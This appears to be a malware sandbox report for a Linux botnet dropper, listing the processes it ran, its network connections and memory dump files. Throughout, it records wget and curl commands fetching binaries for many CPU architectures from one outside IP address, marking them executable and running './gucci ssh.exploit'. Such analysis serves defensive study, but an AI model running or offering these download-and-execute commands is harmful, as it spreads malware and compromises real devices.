/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm6]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm7]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/m68k]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mips]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mpsl]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/ppc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/sh4]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/spc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/x86]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

Network

Country Destination Domain Proto
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp

Files

memory/715-1-0xb6794000-0xb67a5044-memory.dmp

memory/722-2-0xb6768000-0xb6779044-memory.dmp

memory/728-3-0xb675a000-0xb676b044-memory.dmp